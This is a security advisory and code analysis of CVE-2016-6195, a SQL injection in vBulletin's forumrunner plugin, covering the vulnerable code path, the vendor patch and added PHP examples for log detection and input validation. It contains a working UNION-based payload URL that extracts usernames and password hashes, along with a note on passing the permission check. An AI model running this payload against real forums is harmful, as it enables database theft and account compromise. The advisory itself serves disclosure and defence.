Author: janes (Knownsec 404 Security Lab)
Date: 2016-11-15
Vulnerability Overview
Summary
vBulletin is a commercial forum application written in PHP. Researchers found a SQL injection vulnerability in the forumrunner core plugin, tracked as CVE-2016-6195. The forumrunner plugin is enabled by default, and by exploiting this vulnerability an attacker can dump the database through SQL injection.
Impact
An attacker can exploit the SQL injection to dump the database.
Affected versions
3.6.x ~ 4.2.1
4.2.2 ~ 4.2.2 Patch Level 5
4.2.3 ~ 4.2.3 Patch Level 1
Vulnerability Analysis
Version used for analysis
4.2.1
The root cause is that the do_get_spam_data() function in forumrunner/includes/moderation.php does not strictly sanitize the postids and threadid parameters, which leads to SQL injection. The core code is:
function do_get_spam_data ()
{
    global $vbulletin, $db, $vbphrase;

    // Both parameters are declared as TYPE_STRING, so clean_array_gpc() does not strictly filter them.
    $vbulletin->input->clean_array_gpc('r', array(
        'threadid' => TYPE_STRING,
        'postids'  => TYPE_STRING,
    ));
    ...
    } else if ($vbulletin->GPC['postids'] != '') {
        $postids = $vbulletin->GPC['postids'];
        // $postids is interpolated into the IN (...) clause without casting or escaping.
        $posts = $db->query_read_slave("
            SELECT post.postid, post.threadid, post.visible, post.title, post.userid,
                   thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid
            FROM " . TABLE_PREFIX . "post AS post
            LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid)
            WHERE postid IN ($postids)
        ");
vBulletin does not read input directly from $_GET and the other superglobals; it uses the clean_gpc() and clean_array_gpc() functions to sanitize input. Neither function strictly filters values of type STRING, and the postids parameter is parsed as a STRING. Because postids is then concatenated into the SQL statement, the result is a SQL injection vulnerability.
Searching for code that calls or references do_get_spam_data() leads to forumrunner/support/common_methods.php:
    'get_spam_data' => array(
        'include'  => 'moderation.php',
        'function' => 'do_get_spam_data',
    ),
Tracing further back, forumrunner/request.php includes support/common_methods.php:
...
// 'cmd' is declared STRING, so process_input() returns it unchanged.
$processed = process_input(array('cmd' => STRING, 'frv' => STRING, 'frp' => STRING));
if (!$processed['cmd']) {
    return;
}
...
require_once(MCWD . '/support/common_methods.php');
...
if (!isset($methods[$processed['cmd']])) {
    json_error(ERR_NO_PERMISSION);
}
// Load the handler file named in the method table (moderation.php for get_spam_data).
if ($methods[$processed['cmd']]['include']) {
    require_once(MCWD . '/include/' . $methods[$processed['cmd']]['include']);
}
if (isset($_REQUEST['d'])) {
    error_reporting(E_ALL);
}
// Dispatch to the handler, i.e. do_get_spam_data() for cmd=get_spam_data.
$out = call_user_func($methods[$processed['cmd']]['function']);
...
In the code above, process_input() (forumrunner/support/utils.php) reads values from $_REQUEST and performs only simple type conversion; STRING values are returned unchanged. The $_REQUEST['cmd'] parameter therefore selects get_spam_data(), which in turn calls do_get_spam_data(). Setting the $_REQUEST['d'] parameter turns on error reporting, which helps with the SQL injection; it can also be left unset, which makes no difference to triggering the vulnerability. All that remains is to build the SQL payload through the postids parameter.
Injection via the postids parameter
payload: forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union select 1,2,3,(select concat(username, 0x3a, password) from user),5,1,7,8,9,10--+
Set a breakpoint and inspect the variable values; the injection result is shown below:
[screenshot: debugger view of the $post variable after the query]
As the screenshot shows, the injected SQL statement executed successfully and the $post['title'] variable now holds the username and password. The forumid column is set to 1, which ensures that the code below does not enter the if condition:
while ($post = $db->fetch_array($posts))
{
    // Permission check is driven by the forumid value returned by the (injected) query.
    $forumperms = fetch_permissions($post['forumid']);
    if (
        !($forumperms & $vbulletin->bf_ugp_forumpermissions['canview'])
        OR
        !($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewthreads'])
        OR
        (!($forumperms & $vbulletin->bf_ugp_forumpermissions['canviewothers']) AND $post['postuserid'] != $vbulletin->userinfo['userid'])
    )
    {
        json_error(ERR_NO_PERMISSION);
    }
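For defenders, the request shape described above (a GET or POST to forumrunner/request.php with cmd=get_spam_data and a non-numeric postids or threadid) is easy to flag in web server logs. The following is an added example, not vBulletin's code or the advisory's; it assumes PHP 7.1 or later, Apache/nginx combined log format, and constructed sample log lines that are labelled as such in the code.

```php
<?php
// Added example (not vBulletin's code): flag requests to forumrunner/request.php
// whose cmd is get_spam_data and whose postids/threadid are not plain id lists.
// Assumes combined log format: ip - - [time] "METHOD target HTTP/x.y" status size ...

function is_id_list(string $value): bool
{
    // The only legitimate shape for these parameters is comma-separated integers.
    return (bool) preg_match('/^-?[0-9]+(,-?[0-9]+)*$/', $value);
}

// Returns a finding for one log line, or null if the request is not suspicious.
function check_log_line(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
        return null;
    }
    $ip = $m[1];
    $time = $m[2];
    $target = $m[4];
    $status = $m[5];

    $url = parse_url($target);
    if (!isset($url['path']) || !preg_match('#/forumrunner/request\.php$#', $url['path'])) {
        return null;
    }
    $params = array();
    if (isset($url['query'])) {
        parse_str($url['query'], $params); // also percent-decodes the values
    }
    if (($params['cmd'] ?? '') !== 'get_spam_data') {
        return null;
    }
    $bad = array();
    foreach (array('postids', 'threadid') as $name) {
        if (isset($params[$name]) && !is_id_list((string) $params[$name])) {
            $bad[$name] = $params[$name];
        }
    }
    if (!$bad) {
        return null;
    }
    return array('ip' => $ip, 'time' => $time, 'status' => $status, 'params' => $bad);
}

// Constructed sample log lines (not real traffic): one benign call, one tainted call, one unrelated hit.
$sample_log = array(
    '203.0.113.5 - - [15/Nov/2016:10:01:02 +0800] "GET /forumrunner/request.php?cmd=get_spam_data&postids=12,15 HTTP/1.1" 200 812 "-" "Forum Runner"',
    '203.0.113.9 - - [15/Nov/2016:10:01:07 +0800] "GET /forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union%20select%201,2,3,4,5,1,7,8,9,10--+ HTTP/1.1" 200 1544 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [15/Nov/2016:10:01:09 +0800] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
);

foreach ($sample_log as $line) {
    $finding = check_log_line($line);
    if ($finding !== null) {
        printf("%s %s status=%s %s\n", $finding['time'], $finding['ip'], $finding['status'], json_encode($finding['params']));
    }
}
```

Only the second sample line is reported. The caveat: because request.php reads its parameters from $_REQUEST, the same call can be sent in a POST body, which a standard access log does not record; for that path the check has to run in a WAF or inside the application, and the benign-looking d=1 parameter is at most a weak supporting signal.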
Patch Analysis
In includes/general_vb.php, the fr_clean_ids function casts each id-type value to an integer, which blocks the SQL injection:
function fr_clean_ids($list = '')
{
    // Split the comma-separated list and force every element to an integer.
    $arr = explode(',', $list);
    $cleanarr = array_map('intval', $arr);
    return implode(',', $cleanarr);
}
In forumrunner/include/moderation.php, do_get_spam_data now filters the $postids and $threadid parameters:
$vbulletin->GPC['postids'] = fr_clean_ids($vbulletin->GPC['postids']);
...
if ($vbulletin->GPC['threadid'] != '') {
    $threadids = $vbulletin->GPC['threadid'];
    $threadids = fr_clean_ids($threadids);
...
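The following added example (not vBulletin's code or the vendor patch) makes the two points of this analysis concrete: why leaving postids as an unfiltered STRING is fatal for an IN (...) clause, and what the integer cast in fr_clean_ids actually does to the payload shown earlier. It reproduces fr_clean_ids so the script runs stand-alone, and adds two things that are assumptions of this example rather than part of the patch: a strict_ids() variant that rejects non-numeric input instead of silently coercing it, and a build_post_query() helper that builds a parameterised IN (...) clause for use with PDO. Requires PHP 7.1 or later.

```php
<?php
// Added example (not vBulletin's code): effect of the patch's integer cast on a
// tainted postids value, plus a reject-and-parameterise alternative.

// Same logic as the patched helper in includes/general_vb.php, reproduced to run stand-alone.
function fr_clean_ids($list = '')
{
    $arr = explode(',', $list);
    $cleanarr = array_map('intval', $arr);
    return implode(',', $cleanarr);
}

// Assumption (not from the patch): reject anything that is not a list of unsigned integers,
// so a tainted value can be logged and refused rather than coerced to 0.
function strict_ids(string $list): ?array
{
    $ids = array();
    foreach (explode(',', $list) as $item) {
        $item = trim($item);
        if (!preg_match('/^[0-9]{1,10}$/', $item)) {
            return null; // caller should log the raw value and return an error
        }
        $ids[] = (int) $item;
    }
    return $ids;
}

// Assumption (not from the patch): one placeholder per id, values bound separately,
// so the ids never touch the SQL text. Table names are simplified (no TABLE_PREFIX).
function build_post_query(array $ids): array
{
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = "SELECT post.postid, post.threadid, post.visible, post.title, post.userid,"
         . " thread.forumid FROM post LEFT JOIN thread USING (threadid)"
         . " WHERE postid IN ($placeholders)";
    return array($sql, $ids);
}

// Constructed inputs: the tainted value is the postids payload from the analysis above,
// the benign value is a normal id list with stray whitespace.
$tainted = "-1)union select 1,2,3,(select concat(username, 0x3a, password) from user),5,1,7,8,9,10--+";
$benign  = "12, 15,3";

// With fr_clean_ids every comma-separated fragment collapses to a single integer,
// so the UNION, the subquery and the comment marker all disappear from the SQL.
echo "fr_clean_ids(tainted): ", fr_clean_ids($tainted), "\n";
echo "fr_clean_ids(benign):  ", fr_clean_ids($benign), "\n";

// strict_ids refuses the tainted value outright and accepts the benign one.
var_dump(strict_ids($tainted));
print_r(strict_ids($benign));

// The accepted ids feed a parameterised query; with a real connection:
//   $stmt = $pdo->prepare($sql); $stmt->execute($params);
list($sql, $params) = build_post_query(strict_ids($benign));
echo $sql, "\n";
print_r($params);
```

The design point: fr_clean_ids is a sufficient fix for this sink because an integer list cannot carry SQL syntax, but it is also lossy (any garbage becomes 0 and is queried silently), which is why a rejecting validator plus bound parameters is the shape to prefer in new code.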
Remediation
- Upgrade vBulletin to a newer release (> 4.2.3).
References
https://www.seebug.org/vuldb/ssvid-92354
https://enumerated.wordpress.com/2016/07/11/1/
http://blog.securelayer7.net/vbulletin-sql-injection-exploit-cve-2016-6195/
Published by Seebug Paper; please credit the source when reposting. Original URL: http://www.jmbmsq.com/116/